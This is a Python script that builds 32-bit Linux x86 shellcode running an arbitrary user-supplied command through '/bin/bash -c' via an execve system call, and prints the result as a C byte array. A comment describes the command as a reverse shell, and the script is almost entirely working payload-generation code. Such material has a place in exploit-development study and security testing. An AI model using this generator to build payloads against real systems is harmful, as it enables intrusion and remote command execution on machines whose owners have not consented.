execve-builder.py

#!/usr/bin/python3

'''
	Jean-Pierre LESUEUR
	@DarkCoderSc

	jplesueur@phrozen.io
	https://www.phrozen.io
'''

import sys
from textwrap import wrap

def fail(message):
    print("[\033[31mKO\033[39m] " + message)

def success(message):
    print("[\033[32mOK\033[39m] " + message)
	
if len(sys.argv) != 2:
	print("Usage: ./gen_cmd_shellcode.py <command>")

	sys.exit()

command = sys.argv[1]

payload = ""

payload += "\\x31\\xc0"                 # xor eax, eax
payload += "\\x50"                      # push eax
payload += "\\x68\\x62\\x61\\x73\\x68"  # push   0x68736162
payload += "\\x68\\x69\\x6e\\x2f\\x2f"  # push   0x2f2f6e69
payload += "\\x68\\x2f\\x2f\\x2f\\x62"  # push   0x622f2f2f
payload += "\\x89\\xe3"                 # mov    ebx,esp
payload += "\\x66\\xb8\\x2d\\x63"       # mov    ax,0x632d
payload += "\\x50"                      # push   eax
payload += "\\x31\\xc0"                 # xor    eax,eax
payload += "\\x89\\xe2"                 # mov    edx,esp
payload += "\\x50"                      # push   eax
#########################################

'''
	Align command following chosen options
'''
pad = 4 - (len(command) % 4)

if (pad < 4):
	command = ("/"*pad) + command

'''
	Write our reverse shell command (Aligned)
'''

for i in reversed(range(0, len(command), 4)):
	opcode = "\\x68"
	for n in range(4):
		opcode += "\\x" + command[i:(i+4)][n:(n+1)].encode('ascii').hex()
		

	payload += opcode

#########################################
payload += "\\x89\\xe6"                 # mov    esi,esp
payload += "\\x50"                      # push   eax
payload += "\\x56"                      # push   esi
payload += "\\x52"                      # push   edx
payload += "\\x53"                      # push   ebx
payload += "\\x89\\xe1"                 # mov    ecx,esp
payload += "\\x50"                      # push   eax
payload += "\\x89\\xe2"                 # mov    edx,esp
payload += "\\xb0\\x0b"                 # mov    al,0xb
payload += "\\xcd\\x80"                 # int    0x80

size = int(len(payload) / 4)
success("Shellcode successfully generated, size={} Bytes.".format(size))

final_payload = "// Shellcode size = {}\n".format(size)
final_payload += "unsigned char code[] = \\\n"

for l in wrap(payload, 64):
	final_payload += "\t\"{}\"\n".format(l)

final_payload = final_payload[:-1] + ";"

print(final_payload)